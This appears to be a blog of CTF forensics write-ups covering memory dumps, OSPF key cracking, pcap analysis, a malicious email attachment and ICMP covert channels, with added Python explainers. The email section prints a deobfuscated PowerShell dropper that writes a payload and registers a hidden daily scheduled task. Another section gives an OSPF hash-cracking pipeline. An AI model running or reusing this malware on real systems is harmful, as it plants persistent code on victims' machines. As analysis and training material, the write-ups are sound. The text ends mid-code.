Forensics

Challenges

Secret Password Stash

I've created the best system for storing all my top-secret information. Hackers can't steal my secrets if I store them in a virtual machine, right? Unfortunately, I accidentally deleted the virtual machine. Oops! Luckily, I saved a memory capture. Can you help me recover my lost passwords?

The flag will be in format - uCTF{flag}

The first thing I had to do was extract the archive with 7z x memory.7z, which blew up from 270MB to a gigabyte. Since this is a memory capture, my first thought was to spin up Volatility3, but I went through some initial triage steps before jumping in:

  1. strings -e l memory.dmp > secret_password_stash_strings.log

    A pre-Volatility step, always a good one to take to get a fair idea of what the data you're working with contains before doing a deep dive. Looking at the logs, one thing that caught my attention and appeared multiple times is C:\Users\admin\Desktop\note_to_self.txt. One of the times, on line 527,696, it appeared next to a Password Safe.lnk, which might mean that there is an Alternate Data Stream at play.

    Continuing to parse through, we can see one of the occurrences by \Device\HarddiskVolume2\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\super_secret_passwords.psafe3.lnk. Eventually we find the true path for this as C:\Users\admin\Documents\My Safes\super_secret_passwords.psafe3, and a backup at C:\Users\admin\Documents\My Safes\super_secret_passwords_001.ibak.

    I think we have enough information to have a good idea of where to start looking with Volatility.

  2. ./vol.py -f memory.dmp windows.filescan | grep passwords

    When I ran the plain filescan command, there were a TON of results, so I decided to filter it down to the files that we know we are interested in. We got the file offsets from this:

    0x3e1745d0 100.0\Users\admin\Documents\My Safes\super_secret_passwords.psafe3   216
    0x3fc36070      \Users\admin\Documents\My Safes\super_secret_passwords.plk      216
    0x3fe1d8f0      \Users\admin\Documents\My Safes\super_secret_passwords_001.ib   216
    

    And we can also go ahead and get the offset for the note_to_self.txt file with the same technique while we're at it:

    0x3e054f20 100.0\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\note_to_self.lnk  216
    0x3fc6c180      \Users\admin\Desktop\note_to_self.txt   216
    
  3. ./vol.py -f memory.dmp -o ./dumped_files windows.dumpfiles.DumpFiles --physaddr 0x3e1745d0

    Also ran it with offset 0x3fc6c180 to get the note and 0x3fc36070 in case the .psafe3 wasn't the only useful file. The note to self just had the text thequickbrownfoxjumpedoverthelazydog, which is typically used for testing a font since it has all the letters of the alphabet in it. The .psafe3 file looks like gibberish, so we know it's either corrupted or encrypted, and that the string in the note may be the password we're looking for.
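As an added example (not part of the original write-up), here is the triage of step 1 done in Python: a small UTF-16LE string extractor that does what strings -e l does, counts each string, keeps the ones that mention an artefact worth chasing, and reports strings that sit within a few bytes of each other in memory, which is the kind of adjacency that put note_to_self.txt next to Password Safe.lnk. The "dump" it runs on is a constructed byte string containing the paths from this challenge, and the INTERESTING markers and neighbours() window are my own choices.

```python
import re
from collections import Counter

# Constructed stand-in for the memory dump: UTF-16LE path strings (the ones the write-up
# found) scattered between filler bytes. A real dump holds the same kind of data at scale.
SAMPLE_DUMP = (
    b"\x00\x11\x22" * 7
    + r"C:\Users\admin\Desktop\note_to_self.txt".encode("utf-16-le")
    + b"\xff\xfe\x00\x00"
    + r"Password Safe.lnk".encode("utf-16-le")
    + b"\x90" * 200
    + r"C:\Users\admin\Documents\My Safes\super_secret_passwords.psafe3".encode("utf-16-le")
    + b"\x00" * 4
    + r"C:\Users\admin\Desktop\note_to_self.txt".encode("utf-16-le")
    + b"\x01\x01"
    + "short".encode("utf-16-le")  # below the minimum length, dropped as `strings` would
)

# Artefacts worth a second look in a Windows dump (my list, extend as needed).
INTERESTING = (".lnk", ".psafe3", ".ibak", "\\Recent\\", "\\Desktop\\")


def utf16le_strings(data: bytes, min_len: int = 8):
    """Yield (offset, text) for runs of printable ASCII stored as UTF-16LE,
    the same strings that `strings -e l` prints."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for m in pattern.finditer(data):
        yield m.start(), m.group().decode("utf-16-le")


def triage(data: bytes, min_len: int = 8):
    """Count every string and keep the ones that mention an interesting artefact."""
    counts = Counter()
    hits = []
    for offset, text in utf16le_strings(data, min_len):
        counts[text] += 1
        if any(marker.lower() in text.lower() for marker in INTERESTING):
            hits.append((offset, text))
    return counts, hits


def neighbours(hits, window: int = 100):
    """Pairs of consecutive hits whose start offsets lie within `window` bytes.
    Strings that sit together in memory often belong to one structure
    (a shortcut and its target, a file object and its backup)."""
    pairs = []
    for (off_a, text_a), (off_b, text_b) in zip(hits, hits[1:]):
        if off_b - off_a <= window:
            pairs.append((text_a, text_b))
    return pairs


if __name__ == "__main__":
    counts, hits = triage(SAMPLE_DUMP)
    for text, n in counts.most_common():
        print(f"{n:>3}  {text}")
    for a, b in neighbours(hits):
        print(f"adjacent: {a!r} <-> {b!r}")
```

On a real dump, read the file in binary and hand it to triage(); the most_common() listing gives the same "this path keeps showing up" signal the write-up got from the strings log, without paging through half a million lines.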

I grabbed the relevant software from Password Safe, opened the .psafe3 file, and entered the password, and we got the flag!

Answer: uCTF{Suppa_secret_pa$$word}

Crack my OSPF

You’ve been tasked with auditing the network at Big Corporation. We need you to obtain the OSPF authentication key being used by the router with the router ID of 172.31.2.56

The flag is simply the cleartext key

If the download here doesn't work (it's a BIG file for CTFd), you can download from http://files.dataspot.space/all.7z

First step is extracting the all.7z file, which gives us a 950MB all.pcap file. Goodie goodie!

The first thing I tried to do was use ip.addr == 172.31.2.56 as a filter to ensure we were only looking at relevant packets, but there were no hits. Next I used ospf as a filter, and that one had more luck. To filter down to the IP of interest, we can use ospf.srcrouter == 172.31.2.56.

I then followed the instructions for OSPFMD5Crack, which were:

  1. Export the filtered traffic to a .pcap file

  2. ettercap -Tqr ./all/ospf.pcap > raw-hashes.txt

    Be sure to have the PCAP file saved as a .pcap, because the Ettercap tool doesn't work with the .pcapng file format.

  3. cat raw-hashes.txt | cut -d ":" -f 2 >> net-md5-hashes.txt

  4. john net-md5-hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

    You may need to do sudo gunzip /usr/share/wordlists/rockyou.txt.gz if you are on a new Kali instance and haven't extracted the Rockyou wordlist yet. To show the passwords a second time, do john --show net-md5-hashes.txt.
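What ettercap pulls out and john checks is simple, and it is worth seeing why a wordlist attack works against it: with OSPF cryptographic authentication (RFC 2328, Appendix D.4.3) the 16-byte trailer on each packet is plain MD5 over the packet bytes followed by the key, NUL-padded to 16 bytes, so anyone holding a capture can test a candidate key offline. The Python below is an added example, not from the write-up or the OSPFMD5Crack tooling: it splits a captured packet into the authenticated bytes, key ID, sequence number and digest, and verifies a key against it, which is the check an auditor runs to confirm a capture against the key in the router config. The Hello packet it verifies is constructed here (router ID and key taken from the challenge).

```python
import hashlib
import hmac
import ipaddress
import struct


def ospf_md5_digest(packet: bytes, key: str) -> bytes:
    """RFC 2328 Appendix D.4.3: trailer = MD5(OSPF packet || key), key NUL-padded to
    16 bytes. `packet` is exactly the bytes covered by the header's length field."""
    padded_key = key.encode()[:16].ljust(16, b"\x00")
    return hashlib.md5(packet + padded_key).digest()


def split_ospf_md5(frame: bytes):
    """Split a captured OSPFv2 packet using AuType 2 (cryptographic) into the
    authenticated bytes, key id, cryptographic sequence number and 16-byte digest.
    With AuType 2 the 8-byte auth field holds 0x0000, key id, auth length, sequence."""
    version, _ptype, length, _rid, _area, _csum, autype = struct.unpack("!BBHIIHH", frame[:16])
    if version != 2 or autype != 2:
        raise ValueError("not an OSPFv2 packet with cryptographic authentication")
    _zero, key_id, auth_len, crypt_seq = struct.unpack("!HBBI", frame[16:24])
    if auth_len != 16 or len(frame) < length + 16:
        raise ValueError("malformed MD5 authentication trailer")
    return frame[:length], key_id, crypt_seq, frame[length:length + 16]


def verify_key(frame: bytes, key: str) -> bool:
    """Does `key` reproduce the digest carried on this packet? (constant-time compare)"""
    packet, _key_id, _seq, digest = split_ospf_md5(frame)
    return hmac.compare_digest(ospf_md5_digest(packet, key), digest)


def build_hello(router_id: str, key_id: int, crypt_seq: int, key: str) -> bytes:
    """Constructed OSPF Hello for area 0.0.0.0 with an MD5 trailer (not a real capture).
    The header checksum is left at zero, as the RFC requires for AuType 2."""
    # Hello body: network mask, hello interval, options, priority, dead interval, DR, BDR
    body = struct.pack("!IHBBIII", 0xFFFFFF00, 10, 0x02, 1, 40, 0, 0)
    length = 24 + len(body)
    header = struct.pack("!BBHIIHH", 2, 1, length, int(ipaddress.IPv4Address(router_id)), 0, 0, 2)
    header += struct.pack("!HBBI", 0, key_id, 16, crypt_seq)
    packet = header + body
    return packet + ospf_md5_digest(packet, key)


# Constructed sample: what a Hello from router ID 172.31.2.56 would carry with the challenge key.
SAMPLE_FRAME = build_hello("172.31.2.56", key_id=1, crypt_seq=0x5F3E1A00, key="missingyou")

if __name__ == "__main__":
    _, kid, seq, digest = split_ospf_md5(SAMPLE_FRAME)
    print(f"key id {kid}, sequence {seq:#x}, digest {digest.hex()}")
    print("key verifies:", verify_key(SAMPLE_FRAME, "missingyou"))
```

The takeaway for the audit report: the sequence number only stops replay, the digest itself is unsalted and unkeyed beyond the shared secret, so the key's strength is the whole defence; a dictionary word like the one here falls to rockyou in seconds.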

Answer: missingyou

Stolen Flights

No story to this one...just need the password for "Tom Fedder"

Stolen_flights.pcapng

The first thing I did upon opening the PCAP was search for frame contains "Tom" and frame contains "Fedder", neither of which had any hits. Next I filtered to http and saw a lot of good traffic, so my guess is that's the protocol of interest in this challenge.

The first interesting HTTP traffic was in packet 783, because it was to https://boardreader.com/. Before going any further, the OCSP traffic was just noise that I wasn't interested in, so I changed the active filter to http and not ocsp to narrow the search space, then expanded it to http and not ocsp and not http.host contains "ocsp" to remove the remaining OCSP traffic from the results.

I decided to start looking at the cookies in the Baidu traffic, but initially wasn't able to make any sense of the cookie pairs. But there is a file called every_cookie_4644b13.js in packet 50,752 that looks like it might be able to explain it to us, so I went ahead and exported the file and made it pretty. After formatting and giving it a thorough read, I didn't see anything that was going to get us useful information out of the cookie pairs, so I moved on.

Trying frame contains "pass" in case there were any "password" or "passwd" strings didn't yield anything super interesting, except possibly tcp.stream eq 633. Following the HTTP stream shows a good bit of data transfer, most of it appearing to be related to Baidu's website.

I tried filtering down to http.cookie to only look at the traffic that would potentially have authentication-related information...

It's In There Somewhere...

This one is layered like that cake at Cheesecake Factory....

the flag will be in the format: HTB{flag}

supercraft.eml

The first thing I noticed is that this challenge looks exactly like one I worked on this past weekend in the HTB Business CTF! Unfortunately I didn't get around to solving the final stint of that challenge... but I did find a write-up that went over the last bit of methodology for it!

These are the steps I took to solve this challenge:

  1. Open the .eml file in Outlook and save the attachment

  2. Open the attachment and a .zip file will automatically download

  3. Extract the JavaScript file from the .zip archive

  4. Run the JavaScript and print the value of the variable hfhwsgmb after the line hfhwsgmb = uwetjyhi.replace(/[sV]/g,'')

  5. Paste the result in CyberChef and decode it as hex

  6. Scroll down to the definition of ynvjonvw and add console.log(ynvjonvw) right after, then run the code in console

  7. Get the PowerShell command from the variable:

    PoweRShElL -EXEcU  byPAss    'IEx(NEW-oBJeCT  SYsTeM.iO.COmpResSion.dEfLaTestReAm( [SySTem.IO.meMOrYStReAm] [convert]::FromBase64String(''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''),[SyStEM.IO.COMPreSSION.cOMPRessIONmodE]::DECOMPReSS)| FOrEach{NEW-oBJeCT  iO.sTReAMREaDEr( $_,[SYsTeM.TExt.eNcodiNg]::AsCii ) } ).reaDTOEnd( )'
    
  8. Decode the PowerShell with the following:

    $base64data = "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"
    $data = [System.Convert]::FromBase64String($base64data)
    $ms = New-Object System.IO.MemoryStream
    $ms.Write($data, 0, $data.Length)
    $ms.Seek(0,0) | Out-Null
    
    $sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
    
    while ($line = $sr.ReadLine()) {  
        $line
    }
    
  9. Decode the result of the command by printing the value of the variable EUMLmXNYuGSWAb:

    SET-ItEM ("VAr"+"Ia"+"B"+"le:4z0")  ([TypE]("{2}{3}{1}{0}" -f'odinG','.enC','sYSTEm.T','ext')  )  ;   sv  IgF  (  [TypE]("{1}{0}{2}{3}" -f'OnVe','SYsTEM.c','r','T')  )  ;sV ('5EV'+'lS') ([type]("{1}{2}{0}" -F 'E','Io','.fIL'))  ;  &("{4}{1}{3}{0}{2}"-f 'ri','et-','ctMode','St','S') -Version 2
    function UYc`xq (${TN`me},${Chk`go`Iul}) {
        for (${eum`lMx`NyUg} = 0; ${eu`mL`MxNYug} -lt ${T`NME}."c`OUnt"; ${Eu`MLMx`NyUG}++) {
          ${T`NME}[${eUM`lM`XnyuG}] = (${t`NmE}[${eUm`Lmx`N`yuG}] -bxor ${c`HKGo`iUl})
        }
        return  ( gEt-vaRIAble ("4"+"Z0")  -VaL)::"As`Cii"."gETs`T`RIng"(${tN`Me})
    }
    function Rc`DAt`CaJT {return (1..16 | .('%'){ '{0:X}' -f (&("{0}{2}{1}" -f 'Ge','andom','t-R') -Max 16) }) -join ''}
    ${E`UM`lm`XNy`UGzzOO} = (&("{0}{1}" -f 'UyC','xq') ([System.Byte[]] @(0x0a,0x16,0x16,0x12,0x58,0x4d,0x4d,0x11,0x16,0x0d,0x0e,0x07,0x0c,0x12,0x0e,0x03,0x0c,0x11,0x4c,0x0a,0x16,0x00,0x4d,0x10,0x4d)) 98)
    ${suQ`QsIgl} = (.("{1}{0}" -f 'Cxq','Uy') ([System.Byte[]] @(0x31,0x3c,0x36)) 80)
    ${X`s`xnap`VE} = (&("{1}{0}"-f'xq','UyC') ([System.Byte[]] @(0x42,0x13,0x7d,0x4c,0x4c,0x78,0x5d,0x48,0x5d,0x13,0x70,0x53,0x5f,0x5d,0x50,0x13,0x71,0x55,0x5f,0x4e,0x53,0x4f,0x53,0x5a,0x48,0x13,0x6b,0x55,0x52,0x58,0x53,0x4b,0x4f,0x13,0x6c,0x53,0x4b,0x59,0x4e,0x6f,0x54,0x59,0x50,0x50,0x13)) 60)
    &('cd') ${XSx`NAp`Ve}
    ${cyR`YX`whqM} = (.("{1}{2}{0}" -f 't','R','cDATCAJ'))+(.("{0}{1}"-f 'UyC','xq') ([System.Byte[]] @(0x67,0x3f,0x2b,0x3a)) 73)
    ${N`yNG} = (.("{1}{0}" -f 'd','pw')).("{0}{1}{2}" -f 'ToStr','i','ng').Invoke() + '\' + ${cyRYXw`H`qM}
    ${WbwM`g`QB} = (.("{2}{1}{0}"-f 'Jt','TCA','RcDA')) + (.("{3}{1}{2}{0}" -f'Jt','AT','CA','RcD'))
    ${u`JRW} = $(.("{0}{1}" -f 'whoa','mi'))
    ${EUMLmX`NYuGS`WAb`lOEP} = (.("{1}{0}"-f'yCxq','U') ([System.Byte[]] @(0x5d,0x7d,0x45,0x3d,0x4d,0x42,0x60,0x50,0x5d,0x37,0x4e,0x74,0x67,0x4c,0x55,0x71,0x55,0x5c,0x4e,0x6a,0x60,0x53,0x35,0x68,0x66,0x6a,0x56,0x7e,0x4f,0x40,0x45,0x74,0x47,0x6a,0x4a,0x68,0x60,0x47,0x46,0x7e,0x4d,0x40,0x34,0x63,0x55,0x37,0x4e,0x68,0x5d,0x5c,0x56,0x68,0x50,0x36,0x4e,0x75,0x5e,0x53,0x4a,0x34,0x4f,0x47,0x4e,0x5c,0x51,0x36,0x4a,0x7d,0x65,0x5c,0x46,0x34,0x48,0x68,0x4a,0x6b,0x5e,0x53,0x7c,0x77,0x4d,0x6d,0x6f,0x4f,0x67,0x7d,0x31,0x57,0x60,0x53,0x30,0x63,0x4d,0x6a,0x46,0x72,0x60,0x36,0x52,0x7d,0x67,0x36,0x6c,0x68,0x66,0x43,0x73,0x71,0x5e,0x5c,0x6c,0x68,0x4d,0x47,0x35,0x68,0x61,0x43,0x52,0x6e,0x4d,0x43,0x4e,0x31,0x67,0x43,0x42,0x7e,0x67,0x7d,0x45,0x6d,0x4d,0x47,0x5d,0x63,0x5d,0x7d,0x73,0x73,0x47,0x63,0x39,0x39)) 4);
    ${r`ERbWtRv} =  $igf::("{1}{3}{0}{2}{4}"-f 'ase64','From','Strin','B','g').Invoke(${eu`ml`MXny`UgsW`ABl`OEp})
      (get-VariAbLe ('5EV'+'LS')  -Va)::("{1}{2}{0}" -f'ytes','wri','teallb').Invoke(${N`ynG},${ReR`Bw`TRV});
    ${as`kz`pH`UpAj} = (.("{0}{1}"-f'p','wd')).("{0}{1}{2}"-f'ToStr','in','g').Invoke() + '\'
    ${vQp`SBX`gyj} = (&("{3}{0}{2}{1}" -f 'cD','Jt','ATCA','R'))
    ${a`etR`sd`f} = (&("{2}{1}{0}" -f 'q', 'cx', 'UY') ([System.Byte[]] @(0x97,0x8b,0x9d,0xa4,0xb3,0xef,0xab,0xac,0x80,0xb0,0xb9,0x80,0xb3,0xeb,0x86,0xec,0xad,0xac,0x80,0xb6,0x91,0x80,0xab,0xb7,0xeb,0xab,0x80,0xee,0xa2)) 223)
    ${t`kqr`mLSfPD} = '"' + (&("{1}{0}"-f 'xq','UyC') ([System.Byte[]] @(0x22,0x2e,0x33,0x6b,0x63,0x22,0x3c,0x39,0x6b,0x66,0x3e,0x38,0x2e,0x29,0x6b)) 75) + "$eUmLmxNYuGZZoO$suqqSiGL/$vQpsbXGyj)" + '"'
    
    # Add your debugging code here, don't run the stuff below that will actually create the task!
    Write-Host "$aSKZpHuPaj$cyrYXWhqM"
    Write-Host ${t`kqr`mLSfPD}
    Write-Host ${a`etR`sd`f}
    
    ${eRQ`cf} = &("{1}{4}{3}{6}{2}{5}{0}"-f'TaskAction','New-S','le','e','ch','d','du') -Execute "$aSKZpHuPaj$cyrYXWhqM" -Argument ${Tk`Q`Rmls`FpD}
    ${tpNDJP`w`Aa} = .("{1}{2}{0}{4}{6}{3}{5}"-f'h','New-S','c','edTaskPrin','edu','cipal','l') "$UJrw"
    ${aIuf`d`yWasr} = .("{4}{1}{5}{2}{0}{3}" -f'igge','w-Sche','askTr','r','Ne','duledT') -Once -At (&("{0}{1}"-f 'Get-D','ate')).AddDays(1) -RepetitionInterval (&("{1}{2}{0}" -f'pan','New-Time','S') -Days 1) -RepetitionDuration (.("{1}{2}{3}{0}"-f'n','New-Ti','meS','pa') -Days(365))
    ${d`wtTAWqx} = .("{5}{4}{0}{6}{1}{3}{2}" -f 'ledT','skS','ttingsSet','e','w-Schedu','Ne','a') -Hidden -MultipleInstances ("{0}{2}{1}" -f'Par','el','all') -AllowStartIfOnBatteries
    .("{2}{1}{3}{4}{6}{0}{5}"-f 'T','egis','R','ter-','Sche','ask','duled') -TaskName ${WbWm`g`Qb} -Action ${Er`qcf} -Trigger ${AI`Uf`dY`WASr} -Settings ${dW`TTAWqx}
    
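Steps 4 through 9 all come down to two obfuscation tricks, and both can be undone without running a single line of the script, which is how I'd rather handle a sample. Every string the script uses is either a byte array XORed with a one-byte key (the UYcxq function) or a cmdlet name reassembled with PowerShell's -f operator ("{4}{1}{3}{0}{2}" -f 'ri','et-','ctMode','St','S'). The Python below is an added example, not part of the original write-up: it reimplements both decoders and runs them over arrays and format strings copied from the script above (the dictionary labels are mine), so the working directory, the dropped file's extension, the flag, and the scheduled-task cmdlets all fall out statically.

```python
import re


def xor_decode(data, key: int) -> str:
    """The script's UYcxq helper in Python: XOR every byte with a one-byte key, read as ASCII."""
    return bytes(b ^ key for b in data).decode("ascii")


def ps_format(fmt: str, *args: str) -> str:
    """Resolve PowerShell's `"{2}{0}{1}" -f a,b,c` string building: {n} becomes args[n]."""
    return re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))], fmt)


# Byte arrays and keys copied from the deobfuscated script; the labels are my own.
XOR_STRINGS = {
    "extension": ([0x67, 0x3f, 0x2b, 0x3a], 73),
    "sub_path": ([0x31, 0x3c, 0x36], 80),
    "working_dir": ([0x42, 0x13, 0x7d, 0x4c, 0x4c, 0x78, 0x5d, 0x48, 0x5d, 0x13, 0x70, 0x53,
                     0x5f, 0x5d, 0x50, 0x13, 0x71, 0x55, 0x5f, 0x4e, 0x53, 0x4f, 0x53, 0x5a,
                     0x48, 0x13, 0x6b, 0x55, 0x52, 0x58, 0x53, 0x4b, 0x4f, 0x13, 0x6c, 0x53,
                     0x4b, 0x59, 0x4e, 0x6f, 0x54, 0x59, 0x50, 0x50, 0x13], 60),
    "flag": ([0x97, 0x8b, 0x9d, 0xa4, 0xb3, 0xef, 0xab, 0xac, 0x80, 0xb0, 0xb9, 0x80, 0xb3,
              0xeb, 0x86, 0xec, 0xad, 0xac, 0x80, 0xb6, 0x91, 0x80, 0xab, 0xb7, 0xeb, 0xab,
              0x80, 0xee, 0xa2], 223),
}

# Format-string fragments copied from the same script.
FORMAT_STRINGS = {
    "strict_mode": ("{4}{1}{3}{0}{2}", ("ri", "et-", "ctMode", "St", "S")),
    "task_action": ("{1}{4}{3}{6}{2}{5}{0}", ("TaskAction", "New-S", "le", "e", "ch", "d", "du")),
    "encoding_type": ("{2}{3}{1}{0}", ("odinG", ".enC", "sYSTEm.T", "ext")),
}


def decode_all() -> dict:
    """Statically recover every obfuscated string above; nothing from the sample is executed."""
    out = {name: xor_decode(data, key) for name, (data, key) in XOR_STRINGS.items()}
    out.update({name: ps_format(fmt, *args) for name, (fmt, args) in FORMAT_STRINGS.items()})
    return out


if __name__ == "__main__":
    for name, value in decode_all().items():
        print(f"{name:14} {value}")
```

Once the strings are readable, the intent is obvious from the cmdlet names alone (New-ScheduledTaskAction, a trigger repeating daily for a year, Register-ScheduledTask with -Hidden), which is why the deobfuscated listing above carries the warning not to run the tail end of it: the persistence mechanism is the part you want to read, not execute.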

Answer: HTB{l0ts_of_l4Y3rs_iN_th4t_1}; 500 points

Deep Six

Another one with really no story behind it....just find the flag.

Flag will be in the format: CCT{flag}

pcap1_v2.pcapng

When opening the PCAP, the first odd thing I notice is that the data protocol is USB, which I haven't had to work with before. So I Googled how to work with it and found these tips for how to get started.

My first step was to git clone https://github.com/carlospolop-forks/ctf-usb-keyboard-parser to my tools directory, then I attempted to extract the keystrokes from the PCAP via tshark:

tshark -r ./pcap1_v2.pcapng -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata > usb-hex-commands.txt

Unfortunately for us, the output was blank! I tried converting our .pcapng to a .pcap and trying again, but no dice. I looked at the suggestions in this article and he said to skim the raw data, so I did that with the final large packet, and was able to see something right off the bat:

pcap_chall.pcap

I tried looking for keystrokes with usb.transfer_type == 0x01 as suggested here, but there were no hits, so something else is going on here. In case it was easier than I was making it, I searched for frame contains "CCT", but unfortunately there were no hits.

One idea is to use usbrply to attempt to convert the binary data into Python commands, so I gave it a shot:

git clone https://github.com/JohnDMcMaster/usbrply.git
cd usbrply
sudo python setup.py install
usbrply --wrapper --device-hi -p pcap1_v2.pcapng > replay.py

But unfortunately it errored out with Exception: Failed to guess vid/pid: found 0 device entries. I made an issue on GitHub here to at least bring it to the author's attention, but I'm moving forwards without it.

Next I dug into what URB_BULK actually means, and it turns out it's file transfer data. So I tried the following tshark command to get all the data transferred in:

tshark -r pcap1_v2.pcapng -Y 'usb.capdata and usb.endpoint_address.direction == 1' -T fields -e usb.capdata | tr -d '\n' > rawdata

I used that because I saw something similar here, and it gave us the raw data! The next step is converting our hex data to binary:

sudo apt install xxd
xxd -r -p rawdata binarydata.bin

And we got the output, but it was mostly gibberish aside from a few mentions of pcap_chal.pcap again. I decided to give binwalk a go to see if we can carve out any files:

sudo binwalk -Me binarydata.bin --run-as=root

And it worked!

extracted_binary_data

Inside the PCAP, I was able to extract an image from fotoforensics.com:

fotoforensics

I tried uploading the image on FotoForensics to see if there was anything hidden in there, but the upload-file.php file was down or I was banned or something. I tried steghide extract -sf ./_binarydata.bin-0.extracted/fotoforensics.png to see if there was something embedded, but steghide doesn't work with .png images.

I tried doing a second binwalk on the PNG image with the following:

sudo binwalk -Me ./_binarydata.bin-0.extracted/fotoforensics.png --run-as=root

And it pulled out a 101KB .zlib file, which is usually indicative of a false positive. I tried to extract it anyways, just in case:

sudo apt install pigz
unpigz ./_binarydata.bin-0.extracted/_fotoforensics.png-0.extracted/3E.zlib

But no such luck. I reached out to one of the challenge creators to see if I was on the right track, but they told me the image was a red herring and that there was other traffic of interest in the PCAP that I should direct my attention to.

I decided to start clicking through all the TCP streams to see if there was anything noteworthy in them, to try to reduce the search space.

I did notice a lot of "Application Data" being transferred via the TLSv1.3 protocol (especially in stream 31), but since it's all encrypted, I don't think there's anything we can do with it.

TCP stream 52 had a password being passed in cleartext via IRC:

:irc.cct NOTICE Auth :*** Looking up your hostname...
CAP LS 302
PASS RedRoverRedRover$$
NICK zoobah
USER binaryphalanx 2 * :binaryphalanx
:irc.cct NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.55.64) instead.
:irc.cct NOTICE Auth :Welcome to .Localnet.!
:irc.cct 001 zoobah :Welcome to the Localnet IRC Network zoobah!binaryphala@192.168.55.64
:irc.cct 002 zoobah :Your host is irc.cct, running version InspIRCd-2.0
:irc.cct 003 zoobah :This server was created on Debian
:irc.cct 004 zoobah irc.cct InspIRCd-2.0 iosw biklmnopstv bklov
:irc.cct 005 zoobah AWAYLEN=200 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANNELLEN=64 CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=255 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 :are supported by this server
:irc.cct 005 zoobah MAXTARGETS=20 MODES=20 NETWORK=Localnet NICKLEN=32 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=307 VBANLIST WALLCHOPS WALLVOICES :are supported by this server
:irc.cct 042 zoobah 108AAAAAC :your unique ID
:irc.cct 375 zoobah :irc.cct message of the day
:irc.cct 372 zoobah :- Welcome to the CCT Test Server for the PCAP assessment!
:irc.cct 376 zoobah :End of message of the day.
:irc.cct 251 zoobah :There are 1 users and 0 invisible on 1 servers
:irc.cct 254 zoobah 0 :channels formed
:irc.cct 255 zoobah :I have 1 clients and 0 servers
:irc.cct 265 zoobah :Current Local Users: 1  Max: 1
:irc.cct 266 zoobah :Current Global Users: 1  Max: 1

This also just so happened to be the only packet that showed up when I filtered on frame contains "CCT". I tried submitting both CCT{binaryphalanx} and CCT{RedRoverRedRover$$} as flags, but neither was correct.

I did a little OSINT and determined that Zoobah is likely the username of the person who created the challenge. Unfortunately, searching for "zoobah" + RedRoverRedRover didn't yield any results. We were able to determine that the challenge was pulled from this TryHackMe room, and from there could look up some additional strategies for solving the challenge.

The hint I found was something I had considered looking into earlier, but had forgotten about. Most standard ICMP traffic follows a similar format, so anything that doesn't would be considered anomalous. So I wrote an ICMP filter to ignore the boilerplate packets and only show the ones that were anomalous:

icmp and !(data.data contains 101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637)

We can pivot off of the information we found and extract the content of the ICMP packets via tshark:

tshark -r pcap_chal.pcap -Y "icmp and icmp.ident == 31337" -T fields -e data.data

But upon doing this, all the data is in hexadecimal format. So we can pipe the output to xxd to convert it to ASCII:

$ tshark -r pcap_chal.pcap -Y "icmp and icmp.ident == 31337" -T fields -e data.data | xxd -r -p
bro, what you up to?n2mhwhy?you didn't send that thing yetoh... well, not over thisif not this, then what?let's use cryptcat insteadanother thing to install?man... no one can see thisstill... rather use encryptionwe need to pick a key to useI know just the oneAngela Bennett uses it to log into the Bethesda Naval HospitalWhat? Oh, that old thing?Hang on, lemme look it upokay, I found it. use the metasploit port to receivelistener is up. send it.okay, it's sent7181f4d45de00ae35b6cf8201c8d852bhash is good
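The Wireshark filter and the tshark | xxd pipeline above are the interactive version of a check that is easy to automate for a whole capture. As an added example (not part of the original write-up), the Python below parses raw ICMP echo packets, validates their checksums, flags any payload that does not contain the stock ping pattern the filter keys on (0x10 through 0x37, which follows the 8-byte timestamp in a Linux ping), and pulls the text out of the anomalous packets for a given identifier. The sample packets are constructed here: two stock pings and two tunnelled messages borrowed from the conversation above; the ICMP identifier 31337 is the one from the tshark command.

```python
import struct

# The Linux ping payload after its 8-byte timestamp is 0x10, 0x11, 0x12, ...;
# the Wireshark filter in the write-up keys on the 0x10..0x37 prefix of it.
STANDARD_PING_PATTERN = bytes(range(0x10, 0x38))


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over ICMP header and payload."""
    if len(data) % 2:
        data = data + b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(ident: int, seq: int, payload: bytes, icmp_type: int = 8) -> bytes:
    """Constructed ICMP echo request (type 8) or reply (type 0) with a valid checksum."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_icmp_echo(pkt: bytes) -> dict:
    """Split an ICMP echo packet into its fields and recompute the checksum."""
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    recomputed = icmp_checksum(pkt[:2] + b"\x00\x00" + pkt[4:])
    return {"type": icmp_type, "code": code, "ident": ident, "seq": seq,
            "payload": pkt[8:], "checksum_ok": recomputed == csum}


def is_anomalous(payload: bytes) -> bool:
    """True when the payload is not the stock ping filler, i.e. the packet carries something else."""
    return STANDARD_PING_PATTERN not in payload


def extract_covert_text(packets, ident: int = 31337):
    """Payload text of the anomalous, well-formed echo packets belonging to one ICMP identifier."""
    lines = []
    for pkt in packets:
        info = parse_icmp_echo(pkt)
        if info["type"] not in (0, 8) or not info["checksum_ok"]:
            continue  # not an echo, or corrupted: skip rather than decode garbage
        if info["ident"] == ident and is_anomalous(info["payload"]):
            lines.append(info["payload"].decode("ascii", "replace"))
    return lines


# Constructed sample capture: a stock ping exchange and two tunnelled messages.
SAMPLE_PACKETS = [
    build_echo(0x1234, 1, b"\x00" * 8 + bytes(range(0x10, 0x40))),
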